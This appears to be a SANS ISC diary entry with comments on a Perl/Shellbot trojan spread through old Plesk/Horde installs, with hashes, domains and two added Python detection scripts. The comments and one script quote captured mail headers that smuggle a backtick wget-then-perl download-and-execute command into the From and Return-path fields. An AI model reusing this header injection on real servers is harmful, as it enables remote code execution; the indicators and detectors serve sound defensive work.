Active Perl/Shellbot Trojan

ISC received a submission from Zach of a Perl/Shellbot.B trojan served from fallencrafts[.]info/download/himad.png [1]. The trojan has limited detection on VirusTotal [2], the script contains a "hostauth" of sosick[.]net [3], and the IRC server the compromised systems connect to is located at From what we have so far, it appears the trojan is being dropped by exploiting older versions of Plesk.

MD5:     bca0b2a88338427ba2e8729e710122cd  himad.png
SHA-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png
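As an added triage example (not code from the diary or from the sample itself), the script below hashes a file, compares it against the two hashes above, searches it for the hosting and "hostauth" domains the diary names, and applies a generic "Perl script that speaks IRC" heuristic. The heuristic's IRC verb list and the stand-in sample in the `__main__` block are constructed for illustration; they are not taken from the real himad.png.

```python
"""Added example: triage a suspected Perl/Shellbot sample against the
indicators published in the diary (hashes of himad.png, de-fanged domains).

The sample bytes built under __main__ are a constructed stand-in for
illustration only and are NOT the real himad.png.
"""
import hashlib
import re

# Indicators copied from the diary entry.
IOC_HASHES = {
    "md5": "bca0b2a88338427ba2e8729e710122cd",
    "sha256": "07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9",
}
IOC_DOMAINS = ("fallencrafts.info", "sosick.net")


def hash_sample(data: bytes) -> dict:
    """Return MD5 and SHA-256 hex digests of the sample bytes."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def find_indicators(data: bytes, domains=IOC_DOMAINS) -> list:
    """Return the known hosting/C2 domains that appear in the sample.

    Shellbot-style Perl scripts usually carry the IRC server and hostauth as
    plain strings, so a case-insensitive substring search is a reasonable
    first pass; packed or obfuscated copies need manual review.
    """
    text = data.decode("latin-1").lower()
    return [d for d in domains if d in text]


def looks_like_perl_irc_bot(data: bytes) -> bool:
    """Heuristic (assumption, not from the diary): Perl shebang or socket
    import together with at least two IRC protocol verbs."""
    text = data.decode("latin-1")
    has_perl = bool(re.search(r"^#!.*perl|\buse\s+(IO::Socket|Socket)\b", text, re.M))
    irc_verbs = sum(1 for v in ("NICK ", "USER ", "JOIN ", "PRIVMSG ") if v in text)
    return has_perl and irc_verbs >= 2


def triage(data: bytes, ioc_hashes=IOC_HASHES, domains=IOC_DOMAINS) -> dict:
    """Combine hash match, string indicators and the heuristic into one verdict."""
    digests = hash_sample(data)
    return {
        "hash_match": any(digests[k] == v for k, v in ioc_hashes.items()),
        "digests": digests,
        "domains": find_indicators(data, domains),
        "perl_irc_bot": looks_like_perl_irc_bot(data),
    }


if __name__ == "__main__":
    # Constructed stand-in for a Shellbot-style script; not the real sample.
    sample = b"""#!/usr/bin/perl
use IO::Socket;
my $server = "irc.example.invalid";   # placeholder, real C2 not reproduced
my @hostauth = ("sosick.net");
print $sock "NICK $nick\\r\\n"; print $sock "USER $nick 8 * :$nick\\r\\n";
"""
    print(triage(sample))
```

Run it against a real file with `triage(open(path, "rb").read())`; a hash match is conclusive, while a domain hit or the heuristic alone only justifies a closer look.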
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


ISC Handler
Oct 26th 2013
I received an interesting attempt to infect my mail server with the Shellbot Trojan. The command to download and execute the trojan is sent as the subject line and as the reply-to.

I have no idea how that command is supposed to be executed; at least my Postfix didn't execute it. Since the mail is sent to postmaster@localhost (I received the mail because it was identified as spam and redirected), the intended target is not the mail client.

Find attached the mail including headers (two header lines with only local information removed):

Return-path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
Received: from localhost (localhost [])
by (Postfix) with ESMTP id 6E6AB482E1
for <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)
X-Envelope-To: <postmaster@localhost>
X-Envelope-To-Blocked: <postmaster@localhost>
X-Quarantine-ID: <xxtP22xJWX7m>
X-Amavis-Alert: BAD HEADER SECTION Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 5.47
X-Spam-Level: *****
X-Spam-Status: Yes, score=5.47 tag=2 tag2=5 kill=5 tests=[BAYES_40=-0.001,
Received: from ([])
by localhost ( []) (amavisd-new, port 10024)
with ESMTP id xxtP22xJWX7m for <postmaster@localhost>;
Mon, 4 Nov 2013 16:58:07 +0100 (CET)
Received: from domain.local (unknown [])
by (Postfix) with ESMTP id 185F9482CB
for <postmaster@localhost>; Mon, 4 Nov 2013 16:58:06 +0100 (CET)
Message-Id: <>
Date: Mon, 4 Nov 2013 16:58:12 +0100 (CET)
From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`

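As an added example (not part of the comment above, and not the poster's code), the script below shows how such a header payload can be spotted and what it would expand to if a downstream script were to interpolate the sender address into a shell command. The `${IFS}` references are the shell's internal field separator, so `wget${IFS}-O${IFS}/tmp/` becomes `wget -O /tmp/` once the shell expands an unquoted word, which is how the attacker avoids literal spaces in an address. The `HEADERS` text is a constructed excerpt modelled on the posted headers, with the same blanked-out hostname, URL and filename; it is sample input, not a live message.

```python
"""Added example: detect shell command-substitution payloads in mail headers
and show the command they would expand to.  HEADERS is a constructed
excerpt modelled on the headers posted in the comment above (the missing
URL/filename/hostname are left blank exactly as in the post).
"""
import email
import re
import shlex

HEADERS = (
    "Return-path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>\n"
    "Received: from localhost (localhost [])\n"
    "\tby (Postfix) with ESMTP id 6E6AB482E1\n"
    "\tfor <check-muell@######.intern>; Mon, 4 Nov 2013 16:58:12 +0100 (CET)\n"
    "From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`\n"
    "Subject: hello\n"
    "\n"
    "body\n"
)

# Backticks, $(...) and the ${IFS} whitespace trick are the usual tells of a
# header value written to be evaluated by /bin/sh rather than read by an MTA.
SHELL_META = re.compile(r"`|\$\(|\$\{IFS\}|\$IFS")


def suspicious_headers(raw: str) -> dict:
    """Return {header_name: value} for every header carrying shell metacharacters."""
    msg = email.message_from_string(raw)
    return {name: value for name, value in msg.items() if SHELL_META.search(value)}


def expand_ifs(value: str) -> str:
    """Replace ${IFS} with a space, as a POSIX shell does when expanding an unquoted word."""
    return re.sub(r"\$\{IFS\}", " ", value)


def extract_commands(value: str) -> list:
    """Pull the command strings out of the backtick substitutions in a header value."""
    return [expand_ifs(c).strip() for c in re.findall(r"`([^`]*)`", value) if c.strip()]


def shell_safe(value: str) -> str:
    """If a header value ever has to reach a shell, quote it so it is one literal word.

    The real fix is to never build a shell command line from header data and to
    pass values as separate argv entries (e.g. subprocess.run([...])) instead.
    """
    return shlex.quote(value)


if __name__ == "__main__":
    for name, value in suspicious_headers(HEADERS).items():
        print(f"{name}: {value!r}")
        print("  would run:", extract_commands(value))
        print("  quoted   :", shell_safe(value))
```

The first command in the payload has no URL after `-O /tmp/` and the second has no filename after `/tmp/`, as in the posted headers, so as captured it would not have done anything useful even if a script had evaluated it; the detector still flags it because the metacharacters, not the completeness of the command, are the signal.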
The way that this is happening is through the Plesk vulnerability in the above article. It may affect more than just Plesk-related systems, but all systems using Horde. They can execute it via the login screen. Take a look at this. I've dealt a lot with these; if you need more assistance with this particular issue, you can always email me directly at, or
Zach W

